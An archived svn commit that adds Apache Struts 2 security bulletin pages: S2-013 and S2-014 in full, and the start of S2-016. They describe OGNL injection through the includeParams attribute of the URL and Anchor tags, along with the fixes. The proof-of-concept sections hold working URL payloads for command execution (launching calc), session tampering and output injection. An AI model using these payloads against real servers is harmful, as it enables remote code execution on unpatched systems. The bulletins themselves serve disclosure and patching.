struts-commits mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From lukaszlen...@apache.org
Subject svn commit: r869821 [30/43] - in /websites/production/struts/content/development/2.x/docs: ./ ajax-validation.data/ big-picture.data/ chaining-interceptor.data/ colophon.data/ config-browser-plugin.data/ create-struts-2-web-application-using-maven-to-m...
Date Wed, 17 Jul 2013 09:31:13 GMT
Added: websites/production/struts/content/development/2.x/docs/s2-013.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-013.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-013.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,207 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-013</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-013.html">S2-013</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-013</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31818224">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31818224">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31818224">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-013-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability, present in the <em>includeParams</em> attribute of the <em>URL</em> and <em>Anchor</em> Tag, allows remote command execution</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote command execution</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">High Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23141">Struts 2.3.14.1</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software</th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14 </td></tr><tr><th colspan="1" rowspan="1" 
 class="confluenceTh">Reporter</th><td colspan="1" rowspan="1" class="confluenceTd"> The Struts Team </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">CVE Identifier</th><td colspan="1" rowspan="1" class="confluenceTd"><a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966" rel="nofollow">CVE-2013-1966</a></td></tr></tbody></table>
+</div>
+
+<h2><a shape="rect" name="S2-013-Problem"></a>Problem</h2>
+
+<p>Both the <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html"><em>s:url</em></a> and <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.1.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html"><em>s:a</em></a> tag provide an <em>includeParams</em> attribute. </p>
+
+<p>The main scope of that attribute is to understand whether includes http request parameter or not.  </p>
+
+<p>The allowed values of includeParams are:</p>
+<ol><li><em>none</em> - include no parameters in the URL (default)</li><li><em>get</em> - include only GET parameters in the URL</li><li><em>all</em> - include both GET and POST parameters in the URL</li></ol>
+
+
+<p>A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an <em>URL</em> or <em>A</em> tag , which will cause a further evaluation. </p>
+
+<p>The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.<br clear="none">
+This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</p>
+
+<h2><a shape="rect" name="S2-013-Proofofconcept"></a>Proof of concept</h2>
+
+<ol><li>Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+ includeParams="all"
+]]></script>
+</div></div>
+<p>Such that the line will be something look like this:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;s:url id="url" action="HelloWorld" includeParams="all"&gt;
+]]></script>
+</div></div>
+<p>(it works also with <em>includeParams="get"</em>).</p></li><li>Run struts2-blank app</li><li>Open the url: <a shape="rect" class="external-link" href="http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D" rel="nofollow">http://localhost:8080/example/HelloWorld.action?fakeParam=%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7D</a><br clear="none">
+ (this is the shortened version <a shape="rect" class="external-link" href="http://goo.gl/lhlTl" rel="nofollow">http://goo.gl/lhlTl</a>)</li></ol>
+
+
+<p>As you will notice, in this case, there is no way to escape/sanitize the fakeParam, since it's not an expected parameter. </p>
+
+<h2><a shape="rect" name="S2-013-Solution"></a>Solution</h2>
+
+<p>The OGNLUtil class was changed to deny eval expressions by default. </p>
+
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>Backward Compatibility</b><br clear="none">In case you need to restore the old behavior, you need to define the following constant, inside your struts configuration (<b>use it at your own risk</b>).
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;constant name="struts.ognl.enableOGNLEvalExpression" value="true" /&gt;
+]]></script>
+</div></div>
+<p>Please, ensure that:</p>
+<ol><li>there are no <em>includeParams</em> with "all" or "get" value</li><li>every parameter which is declared inside the <em>u</em> or <em>a</em> tag come from a sanitized input.</li></ol>
+</td></tr></table></div>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23141">Struts 2.3.14.1</a>, which contains the corrected OGNL and XWork library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-014.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-014.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-014.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,214 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-014</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-014.html">S2-014</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-014</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822584">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31822584">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822584">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31822584">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822584">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31822584">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-014-Summary"></a>Summary</h2>
+
+
+<p>A vulnerability introduced by forcing parameter inclusion in the <em>URL</em> and <em>Anchor</em> Tag allows remote command execution, session access and manipulation and XSS attacks</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers and users</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote command execution, remote server context manipulation, injection of malicious client side code</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">Highly Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23142">Struts 2.3.14.2</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software</th><td colspan="1" rowspan="1" clas
 s="confluenceTd"> Struts 2.0.0 - Struts 2.3.14.1 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Reporter</th><td colspan="1" rowspan="1" class="confluenceTd"> Eric Kobrin and Douglas Rodrigues (Akamai), Coverity Security Research Laboratory, NSFOCUS Security Team </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">CVE Identifier</th><td colspan="1" rowspan="1" class="confluenceTd"><a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115" rel="nofollow">CVE-2013-2115</a>, <a shape="rect" class="external-link" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966" rel="nofollow">CVE-2013-1966</a></td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-014-Problem"></a>Problem</h2>
+
+<p>Both the <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html"><em>s:url</em></a> and <a shape="rect" class="external-link" href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html"><em>s:a</em></a> tag provide an <em>includeParams</em> attribute. </p>
+
+<p>The main scope of that attribute is to understand whether includes http request parameter or not.  </p>
+
+<p>The allowed values of includeParams are:</p>
+<ol><li><em>none</em> - include no parameters in the URL (default)</li><li><em>get</em> - include only GET parameters in the URL</li><li><em>all</em> - include both GET and POST parameters in the URL</li></ol>
+
+
+<p>A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into the stack, afterward used as request parameter of an <em>URL</em> or <em>A</em> tag , which will cause a further evaluation. </p>
+
+<p>The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.<br clear="none">
+This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.</p>
+
+<p>The issue was originally addressed by Struts 2.3.14.1 and Security Announcement <a shape="rect" href="s2-013.html" title="S2-013">S2-013</a>. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that <b>every</b> version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.</p>
+
+<h2><a shape="rect" name="S2-014-Proofofconcept"></a>Proof of concept</h2>
+
+<ol><li>Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[
+ includeParams="all"
+]]></script>
+</div></div>
+<p>Such that the line will be something look like this:</p>
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: xml; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;s:url id="url" action="HelloWorld" includeParams="all"&gt;
+]]></script>
+</div></div></li><li>Run struts2-blank app</li><li>Open the following url, resulting in calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):
+  <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}]]></script>
+</div></div></li><li>Open the following url to modify session content:
+  <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}]]></script>
+</div></div></li><li>Open the following url to print out session content and in combination with the previous example introduce arbitrary code into the resulting HTML output:
+  <div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: java; gutter: false" type="syntaxhighlighter"><![CDATA[http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}]]></script>
+</div></div></li></ol>
+
+
+<p>As you will notice, in this case, there is no way to escape/sanitize the malicious parameter, since it's not an expected parameter and even will not get evaluated the request parameters are processed. </p>
+
+<h2><a shape="rect" name="S2-014-Solution"></a>Solution</h2>
+
+<p>The URL rendering subsystem was changed to not pass any parameter name or value to OGNL evaluation.</p>
+
+<p>The MemberAccess component's allowStaticMethodAccess property is now immutable.</p>
+
+<div class="panelMacro"><table class="noteMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>Backward Compatibility</b><br clear="none">A small amount of very elaborated <em>URL</em> or <em>A</em> tag usages depending on the now disabled evaluation might produce unexpected results now.<br clear="none">
+Please, ensure that
+<ol><li>all expressions that should get evaluated are explicitly introduced via <em>PARAM</em> tags within <em>URL</em> or <em>A</em> tags.</li><li>all expressions used in <em>PARAM</em> tags come from a sanitized input.</li></ol>
+</td></tr></table></div>
+
+<div class="panelMacro"><table class="warningMacro"><colgroup span="1"><col span="1" width="24"><col span="1"></colgroup><tr><td colspan="1" rowspan="1" valign="top"><img align="middle" src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif" width="16" height="16" alt="" border="0"></td><td colspan="1" rowspan="1"><b>It is strongly recommended to upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts23142">Struts 2.3.14.2</a>, which contains the corrected OGNL and XWork library.</b></td></tr></table></div></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-016.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-016.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-016.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,192 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-016</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-016.html">S2-016</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-016</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293800">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=33293800">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293800">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=33293800">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=33293800">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
